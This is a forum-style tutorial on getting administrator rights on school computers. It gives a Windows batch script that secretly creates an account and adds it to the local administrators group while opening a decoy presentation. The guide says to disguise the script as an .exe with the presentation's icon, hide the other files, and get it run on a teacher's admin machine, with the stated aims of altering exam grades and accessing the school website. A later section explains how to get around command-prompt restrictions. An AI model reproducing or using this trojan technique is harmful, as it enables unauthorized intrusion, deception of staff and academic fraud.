(adsbygoogle = window.adsbygoogle || []).push({});
Tutorial: How to get an admin status at your school
(Scroll Down To Bottom For How To Get Into CMD At School)
Why to do something like this?
You can for example look up the exam files and change your note or you even can get access to your schools website.
Let's start
For Example you have to prepare a presentation as homework. So we will connect a batch file (with the code to get admin) and .odp file OpenOffice presentation)
Batch file for the admin and also opening the presentation file
You will need your presentation file now. I will call it presentation.odp.
You just have to open the editor and type the code.
You must login or register to view this content.
Code:
================================================================
@echo off
net user <username> <password> /add
net localgroup administrators <username> /add
start presentation.odp
exit
================================================================
For <username> just type a name you want for you admin account and for <password> the password for the login process
.
Save this file as presentation.bat
.
In different countries the localgroup administrators can be different. To check it just type "net localgroup" and you will find something that will stand for admins in your country.
Code explanation
@echo off - won't print all the following commands
net user <username> <password> /add - creates a new user
net localgroup administrators <username> /add - gives the admin status to the created account
start presentation.odp opens the presentation with the default program for the .odp extension
exit - closes the cmd immediately after ending the last command
Changing the icon of the .odp file
Download the icon for .odp file (just google it).
Download a .bat to .exe converter and use the icon.
Save the .exe file as presentation.exe
Last step
Hide all the other files, except the launcher. The only important thing is that you have to launch This program from an admin computer under windows. It won't work for mac computers.
I will take no responsibility for launchin it in your school. It is illegal without the permissions!
HOW TO GET INTO CMD AT YOUR SCHOOL
(1) download opera
(2) run it
(3) right click on it and press source
(4) select all and delet
(5) then type command.exe
(6) save as command.bat on the desktop
(7) double click on the bat file and then you got command
If this does not work try using this method.
Open notepad
type:
@echo off
command
@echo on
save as mycmd.bat instead of mycmd.txt.
NOTE:
you should change from .bat to .txt when not using the cmd
Enjoy everybody
This Does Not Work For All Schools! Enjoy
Thanks..
Skype : GaMesPrestige
Twitter : @MrGaMesPrestige
Youtube :
You must login or register to view this content.